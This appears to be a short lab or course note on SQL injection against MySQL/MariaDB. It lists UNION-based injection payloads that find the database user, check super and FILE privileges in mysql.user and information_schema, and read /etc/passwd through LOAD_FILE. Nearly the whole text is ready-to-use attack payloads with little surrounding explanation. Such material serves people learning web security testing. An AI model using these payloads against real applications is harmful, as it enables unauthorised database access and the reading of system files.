Privileges
We first need to find out about our user privilege within the database.
DB User
Use following queries to find out about the current DB user:
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.userinjection payload should look like this:
cn' UNION SELECT 1, user(), 3, 4-- -Or
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -User Privilege
Now that we know our user, we can start looking for what privilege we have.
To test for super admin privilege:
SELECT super_priv FROM mysql.userInjection payload should look like this:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -To see privilege for certain user:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -We can also dump other privilege we have directly from the schema as such:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -Again, we can search for specific user as such:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -If we see FILE privilege listed for our user, we can proceed with attempting to read files.
LOAD_FILE
LOAD_FILE() function can be used in MariaDB/MySQL to read data from files.
It works as such:
SELECT LOAD_FILE('/etc/passwd');We can use it in UNION injection like below:
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -